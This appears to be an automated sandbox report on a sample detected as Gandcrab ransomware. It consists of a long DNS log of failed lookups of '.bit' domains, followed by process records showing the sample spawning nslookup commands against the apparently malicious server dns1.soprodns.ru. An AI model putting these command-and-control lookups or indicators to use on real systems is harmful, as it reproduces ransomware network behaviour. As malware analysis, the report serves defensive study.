Aug 31, 2022 23:50:11.937248945 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:12.383526087 CEST	8.8.8.8	192.168.2.6	0x3d0f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.407648087 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:12.429454088 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.453207016 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:12.473371029 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.493643045 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:13.443161964 CEST	8.8.8.8	192.168.2.6	0xead9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.475533962 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:13.497633934 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.529026031 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:13.549556971 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.571007013 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:13.960828066 CEST	8.8.8.8	192.168.2.6	0x71e7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.993717909 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:14.013231039 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.037378073 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:14.058753014 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.081089973 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:14.978720903 CEST	8.8.8.8	192.168.2.6	0xe1fb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.004993916 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:15.023289919 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.043770075 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:15.064199924 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.094535112 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:17.137248039 CEST	8.8.8.8	192.168.2.6	0x45ab	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.167509079 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:17.187731981 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.208631039 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:17.226890087 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.246968031 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:17.562474012 CEST	8.8.8.8	192.168.2.6	0x45ab	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.605894089 CEST	8.8.8.8	192.168.2.6	0xe55c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.639391899 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:18.684160948 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.746282101 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:18.766663074 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.786726952 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:19.720679045 CEST	8.8.8.8	192.168.2.6	0xe55c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.806276083 CEST	8.8.8.8	192.168.2.6	0x17fb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.837085962 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:19.857325077 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.877415895 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:19.897783041 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.919105053 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:22.331629038 CEST	8.8.8.8	192.168.2.6	0xdd32	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.359858990 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:22.380099058 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.397959948 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:22.422846079 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.442930937 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:22.894814968 CEST	8.8.8.8	192.168.2.6	0xdd32	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.301311970 CEST	8.8.8.8	192.168.2.6	0x2339	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.326419115 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:23.349076033 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.367690086 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:23.389586926 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.410267115 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.301399946 CEST	8.8.8.8	192.168.2.6	0xb987	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.329447031 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.350253105 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.370569944 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.390916109 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.411137104 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.806338072 CEST	8.8.8.8	192.168.2.6	0x3a0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.831897020 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.850459099 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.870646000 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:24.890717030 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.910834074 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:25.904484034 CEST	8.8.8.8	192.168.2.6	0x2446	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:25.932872057 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:26.317761898 CEST	8.8.8.8	192.168.2.6	0xdd32	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:27.967365980 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:27.988606930 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:28.055430889 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:29.829662085 CEST	8.8.8.8	192.168.2.6	0xc06b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.927891970 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:29.951251984 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:30.030755997 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:30.151573896 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:30.169919014 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:33.027606010 CEST	8.8.8.8	192.168.2.6	0xcae5	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.070842028 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:33.089258909 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.109560013 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:33.129426956 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.150530100 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:33.609451056 CEST	8.8.8.8	192.168.2.6	0x7e06	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.636173010 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:33.656276941 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.678827047 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:33.701402903 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.722425938 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:34.124522924 CEST	8.8.8.8	192.168.2.6	0x94db	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.160888910 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:34.184612036 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.204812050 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:34.224951029 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.245430946 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:34.743029118 CEST	8.8.8.8	192.168.2.6	0xc06b	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.796749115 CEST	8.8.8.8	192.168.2.6	0x2898	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.824281931 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:34.844573975 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.864664078 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:34.884864092 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.902848959 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:35.827125072 CEST	8.8.8.8	192.168.2.6	0x35c5	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.856575966 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:35.876837969 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.900613070 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:35.921055079 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.941112041 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:37.934292078 CEST	8.8.8.8	192.168.2.6	0x2a1b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.961843967 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:37.980525970 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.007184982 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:38.027669907 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.047924995 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:38.412417889 CEST	8.8.8.8	192.168.2.6	0x95d8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.439403057 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:38.459865093 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.480101109 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:38.500571966 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.520761013 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:39.928921938 CEST	8.8.8.8	192.168.2.6	0x2a1b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.055721998 CEST	8.8.8.8	192.168.2.6	0xbe58	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.081710100 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:41.102299929 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.125132084 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:41.145561934 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.165729046 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:41.456968069 CEST	8.8.8.8	192.168.2.6	0xbe58	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.553389072 CEST	8.8.8.8	192.168.2.6	0xbe58	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.981617928 CEST	8.8.8.8	192.168.2.6	0x7e01	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.012507915 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:42.033417940 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.053452969 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:42.071616888 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.091794014 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:42.379776001 CEST	8.8.8.8	192.168.2.6	0xc002	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.407059908 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:42.427475929 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.447566032 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:42.465789080 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.486059904 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:44.269579887 CEST	8.8.8.8	192.168.2.6	0x796	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.298013926 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:44.318439007 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.338943958 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:44.359947920 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.382220984 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:44.722793102 CEST	8.8.8.8	192.168.2.6	0x796	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.619430065 CEST	8.8.8.8	192.168.2.6	0xe7ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.643874884 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:45.662398100 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.680767059 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:45.682105064 CEST	8.8.8.8	192.168.2.6	0xe7ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.701210022 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.725753069 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:46.946067095 CEST	8.8.8.8	192.168.2.6	0x2664	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.975125074 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:46.995784998 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.015886068 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:47.036571026 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.056572914 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:48.583686113 CEST	8.8.8.8	192.168.2.6	0x2664	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: eW1QrimJYd.exePID: 4500, Parent PID: 5436

General

Target ID:	1
Start time:	23:48:35
Start date:	31/08/2022
Path:	C:\Users\user\Desktop\eW1QrimJYd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eW1QrimJYd.exe"
Imagebase:	0xa80000
File size:	75264 bytes
MD5 hash:	B7325E075262FFDEAA68CAE94018CADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000000.250804234.0000000000A89000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5720, Parent PID: 4500

General

Target ID:	5
Start time:	23:48:44
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5276, Parent PID: 5720

General

Target ID:	6
Start time:	23:48:44
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5916, Parent PID: 4500

General

Target ID:	7
Start time:	23:48:48
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5460, Parent PID: 5916

General

Target ID:	8
Start time:	23:48:48
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
